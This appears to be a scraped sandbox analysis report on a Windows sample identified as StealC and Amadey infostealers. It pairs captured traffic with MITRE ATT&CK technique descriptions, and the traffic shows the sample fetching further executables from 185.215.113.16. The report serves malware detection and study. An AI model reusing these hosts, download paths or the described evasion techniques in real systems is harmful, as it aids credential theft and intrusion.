Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 01 Sep 2024 01:45:41 GMTIf-None-Match: "66d3c745-1b0600"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache

Source: uu_host_config.12.dr, 000003.log7.12.dr, f_000002.13.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: uu_host_config.12.dr, 000003.log7.12.dr, f_000002.13.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: uu_host_config.12.dr, 000003.log7.12.dr, f_000002.13.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\360d0454-832a-4557-b272-e47c6700cf82.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\48e54626-1b2b-4c31-afae-de2313a6cae2.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\786d6fbe-9761-4938-82c5-19a412c489eb.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\7a5c6d1b-2a06-45cf-9d90-fde82d78a082.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\846de5d7-a771-4c50-b59c-3e50d33757e3.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\85591e8d-e54d-4cbf-ab76-f48df88e85ed.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\8cb370cb-3017-40df-ae81-13b16ad74c9e.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\97552c85-1b6f-41d7-bc9c-266983d790e9.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Ad Blocking\ade590cf-8759-45cb-8cb7-5f8ad5e9f8e6.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\BrowserMetrics-spare.pma (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\BrowserMetrics-spare.pma.tmp

Windows Analysis Report
file.exe

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre